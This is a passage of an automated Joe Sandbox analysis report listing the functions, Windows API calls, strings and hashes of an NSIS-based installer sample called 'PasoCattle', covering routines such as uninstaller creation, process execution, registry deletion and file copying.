Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
`G, xrefs: 0040246E
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
